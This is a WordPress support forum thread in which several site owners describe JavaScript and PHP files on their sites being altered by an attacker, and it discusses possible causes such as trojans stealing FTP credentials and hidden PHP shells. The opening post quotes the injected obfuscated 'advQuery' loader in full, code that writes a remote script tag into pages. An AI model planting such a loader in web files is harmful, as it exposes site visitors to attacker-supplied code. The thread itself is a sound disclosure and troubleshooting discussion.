Support » Plugins » Cforms.js hacked, warning

  • Hi,

    I received an email regarding a hack on my site. I delved further, downloaded the entire lot and went through it.

    I found that the plugins/cforms/js/cforms.js had been altered.

    At the end of it, this was appended:

    function advQuery(){var Host="";Track="/if.php";get=unescape("%6E%65%74");document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));};advQuery();

    Just FYI.

    Question is of course – how did this happen? I have tried to secure it as much as I can, removed wp-atom, xmlrpc etc., secured directories, have few plugins, yet this still happens.


Viewing 12 replies - 1 through 12 (of 12 total)
  • I have exactly the same problem, however in WordPress Core.

    wp-includes/js/jquery/jquery.js was been modified.
    As @jbbrwcky tells, the advQuery line was appended.

    Anyone knows more about this?
    I have closed additionally tested to close all of my plugins. Hiwever the wordpress jQuery remains under fire. So 😕

    edit: resolved (some) misspelling

    I’m running two WordPress blogs, hosted on the same server, and both got infected with this, although at different files:

    <my theme>/footer.php at one blog. This was efficient, as any HTML file served by my WordPress installation called this malicious code 😐
    wp-includes/js/jquery/jquery.js (same as Hirvine) at the other.

    – Konstantin.

    I would like to echo this chorus.

    On different blog installations, I have had my main index.php, jquery.js, cforms.js, and other plugin files injected with this malicious code.

    Does anyone know of any vulnerabilities in the WordPress core or certain plugins that might be allowing these hacks? I always update to the most recent version…


    This is a good question.

    I discovered this week that my site had been hacked. The hacker was using a php file that was in an old month in the uploads folder to add spam links to my site index (root directory index.html, not blog directory) and footer.php.

    So I am in the middle of taking all the precautions; I changed all the passwords, upgraded from 2.8.1 to 2.8.2, and am looking through the site for other suspicious code — but I don’t know where the hole is or whether it has been fixed.

    WordPress hello? I’ve seen this happening all over the interwebs as of recent. Some information would be useful. Thank you.

    Umm, for example:
    (not sure how long that link will be valid for)

    I run several wordpress sites and two sites got hacked, one several times even after deleting the phishing content. It resulted in a big argument with the host and they suspended this domain.

    I am not a programmer,so i have no idea how to prevent this from happening again and for me to even see what has changed in PHP files is a huge task. These sites are my source of income. Any help?


    I have seen a variety of files with this hack, including core and plugin scripts (wp-ecommerce, nextgen gallery…)

    I’ve examined the database to see if there was a sql injection causing this b/c I would remove the hack and it would return. I couldn’t find anything so I am left with updating WP and continually deleting right now…or disabling the plugin which is not ideal.

    Did this ever get sorted out? A friend’s blog went through the same thing yesterday, he didn’t listen to me when I said always update but if it hasn’t been fixed I guess it wouldn’t have mattered.

    I’m sorry to tell you folks that it is not a matter of updating the blog. I have several blogs and two of them have been hacked. One of them had only two daysof being installed for the first time !!! Two days… the latest version… and it was hacked.!!! I believe we need to hear from someone that really understands the problem.

    Just echoing this.
    Bump WP admins..

    To those of you who have been hacked, the answer has been repeated over and over in these forums: The hacker is gaining access to your WP installation through your FTP on your desktop.

    And your WordPress blog is being hacked because you have a trojan hiding on your PC. You are wasting your time securing or upgrading your WP installation if you do not find and delete the trojan and/or malware on your PC first.

    Changing your passwords and upgrading WP is useless if your PC is still infected with a trojan. Additionally, the hacker hides a PHP shell script somewhere on your servers outside of your WP install. To find it you must either run a virus scan on your entire server (or ask your host to run one) or you can manually eyeball the dates inside every single folder on your server (inside and outside of WP) to see which file was updated recently or to find filenames that you know you didn’t create.

    Once you remove the PHP shell file(s), you must scan your hard drive for trojans/malware. Once your HD is clean you can then change your passwords and upgrade your WP install or simply overwrite your files with clean files. I would suggest using several different anti-virus/anti-malware programs to find the trojan. Malwarebytes is a good start.

Viewing 12 replies - 1 through 12 (of 12 total)
  • The topic ‘Cforms.js hacked, warning’ is closed to new replies.